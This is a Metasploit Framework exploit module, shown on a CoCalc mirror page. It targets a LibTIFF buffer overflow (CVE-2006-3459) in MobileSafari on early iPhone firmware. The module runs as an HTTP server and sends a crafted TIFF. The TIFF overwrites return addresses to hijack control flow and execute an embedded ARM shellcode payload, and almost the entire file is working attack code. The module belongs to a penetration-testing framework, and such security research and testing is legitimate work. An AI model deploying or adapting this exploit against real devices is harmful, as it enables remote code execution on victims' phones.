CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/apple_ios/browser/safari_libtiff.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Apple iOS MobileSafari LibTIFF Buffer Overflow',

17
      'Description'    => %q{

18
          This module exploits a buffer overflow in the version of

19
        libtiff shipped with firmware versions 1.00, 1.01, 1.02, and

20
        1.1.1 of the Apple iPhone. iPhones which have not had the BSD

21
        tools installed will need to use a special payload.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>  ['hdm', 'kf'],

25
      'References'     =>

26
        [

27
          ['CVE', '2006-3459'],

28
          ['OSVDB', '27723'],

29
          ['BID', '19283']

30
        ],

31
      'Payload'        =>

32
        {

33
          'Space'    => 1800,

34
          'BadChars' => "",

35


36
          # Multi-threaded applications are not allowed to execve() on OS X

37
          # This stub injects a vfork/exit in front of the payload

38
          'Prepend'  =>

39
            [

40
              0xe3a0c042, # vfork

41
              0xef000080, # sc

42
              0xe3500000, # cmp r0, #0

43
              0x1a000001, # bne

44
              0xe3a0c001, # exit(0)

45
              0xef000080  # sc

46
            ].pack("V*")

47
        },

48
      'Arch'           => ARCH_ARMLE,

49
      'Platform'       => %w{ osx },

50
      'Targets'        =>

51
        [

52


53
          [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)',

54
            {

55
              'Platform' => 'osx',

56


57
              # Scratch space for our shellcode and stack

58
              'Heap'     => 0x00802000,

59


60
              # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib

61
              'Magic'    => 0x300d562c,

62
            }

63
          ],

64
        ],

65
      'DefaultTarget'  => 0,

66
      'DisclosureDate' => '2006-08-01'

67
      ))

68
  end

69


70
  def on_request_uri(cli, req)

71


72


73
    # Re-generate the payload

74
    return if ((p = regenerate_payload(cli)) == nil)

75


76
    # Grab reference to the target

77
    t = target

78


79
    print_status("Sending exploit")

80


81
    # Transmit the compressed response to the client

82
    send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' })

83


84
    # Handle the payload

85
    handler(cli)

86
  end

87


88
  def generate_tiff(code, targ)

89


90
    #

91
    # This is a TIFF file, we have a huge range of evasion

92
    # capabilities, but for now, we don't use them.

93
    #  - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday

94
    #

95


96
    lolz = 2048

97
    tiff =

98
      "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+

99
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+

100
      "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+

101
      "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+

102
      "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+

103
      "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+

104
      "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+

105
      "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+

106
      "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+

107
      "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+

108
      [lolz].pack("V") +

109
      "\x84\x00\x00\x00\x00\x00\x00\x00"

110


111
    # Randomize the bajeezus out of our data

112
    hehe = rand_text(lolz)

113


114
    # Were going to candy mountain!

115
    hehe[120, 4] = [targ['Magic']].pack("V")

116


117
    # >> add r0, r4, #0x30

118
    hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V")

119


120
    # Candy mountain, Charlie!

121
    # >> mov r1, sp

122


123
    # It will be an adventure!

124
    # >> mov r2, r8

125
    hehe[ 92, 4] = [ hehe.length ].pack("V")

126


127
    # Its a magic leoplurodon!

128
    # It has spoken!

129
    # It has shown us the way!

130
    # >> bl _memcpy

131


132
    # Its just over this bridge, Charlie!

133
    # This magical bridge!

134
    # >> ldr r3, [r4, #32]

135
    # >> ldrt r3, [pc], r3, lsr #30

136
    # >> str r3, [r4, #32]

137
    # >> ldr r3, [r4, #36]

138
    # >> ldrt r3, [pc], r3, lsr #30

139
    # >> str r3, [r4, #36]

140
    # >> ldr r3, [r4, #40]

141
    # >> ldrt r3, [pc], r3, lsr #30

142
    # >> str r3, [r4, #40]

143
    # >> ldr r3, [r4, #44]

144
    # >> ldrt r3, [pc], r3, lsr #30

145
    # >> str r3, [r4, #44]

146


147
    # We made it to candy mountain!

148
    # Go inside Charlie!

149
    # sub sp, r7, #0x14

150
    hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V")

151


152
    # Goodbye Charlie!

153
    # ;; targ['Heap'] + 0x48 becomes the stack pointer

154
    # >> ldmia sp!, {r8, r10}

155


156
    # Hey, what the...!

157
    # >> ldmia sp!, {r4, r5, r6, r7, pc}

158


159
    # Return back to the copied heap data

160
    hehe[192, 4] = [  targ['Heap'] + 196  ].pack("V")

161


162
    # Insert our actual shellcode at heap location + 196

163
    hehe[196, payload.encoded.length] = payload.encoded

164


165
    tiff << hehe

166
  end

167
end

168


169